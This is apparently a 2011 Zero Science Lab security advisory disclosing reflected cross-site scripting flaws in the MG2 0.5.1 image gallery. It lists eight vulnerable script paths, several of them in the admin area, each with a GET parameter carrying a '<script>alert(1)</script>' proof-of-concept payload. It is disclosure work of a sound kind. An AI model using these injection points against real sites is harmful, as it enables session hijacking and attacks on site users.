# # # MG2 0.5.1 Multiple XSS Vulnerabilities # # # # # # Vendor: MiniGal # # Product web page: http://www.minigal.dk # # Affected version: 0.5.1 # # # # Summary: MG2 is the sequel to the popular # # image gallery script MiniGal. One of the # # highlights of MG2 is, that it supports PHP # # running in safe mode which is unsupported # # by almost all other dynamic image gallery # # scripts on the web. # # # # Desc: MG2 suffers from multiple XSS vulns. # # Several parameters are vulnerable that are # # not sanitized before being returned to the # # user. This can be exploited to execute # # arbitrary HTML and script code in a user's # # browser session in context of an affected # # site. # # # # Tested on: MS WinXP Pro SP3 (EN), XAMPP # # # # Vulnerability discovered by: LiquidWorm # # # # Advisory ID: ZSL-2011-4993 # # # # # # 03.02.2011 # # # # # ########################################################### | | | | | | .-----0------------------------------------------0-----. | | | | | /mg2/skins/rounded/templates/thumbnails_password.php | | - param(GET): list=25<script>alert(1)</script> | | - param(GET): id=25<script>alert(1)</script> | | | | /mg2/skins/rounded/templates/viewimage_comments.php | | - param(GET): id=31<script>alert(1)</script> | | | | /mg2/skins/admin/admin1_menu.php | | - param(GET): list=41<script>alert(1)</script> | | | | /mg2/skins/admin/admin2_comments.php | | - param(GET): list=45<script>alert(1)</script> | | | | /mg2/skins/admin/admin2_edit.php | | - param(GET): editID=53<script>alert(1)</script> | | | | /mg2/skins/admin/admin2_newfolder.php | | - param(GET): list=59<script>alert(1)</script> | | | | /mg2/skins/admin/admin3_folders.php | | - param(GET): list=71<script>alert(1)</script> | | | | | *------------------------------------------------------* Created by: MiniAdvisory Creator v1.0.3g 2011 &#169; Zero Science Lab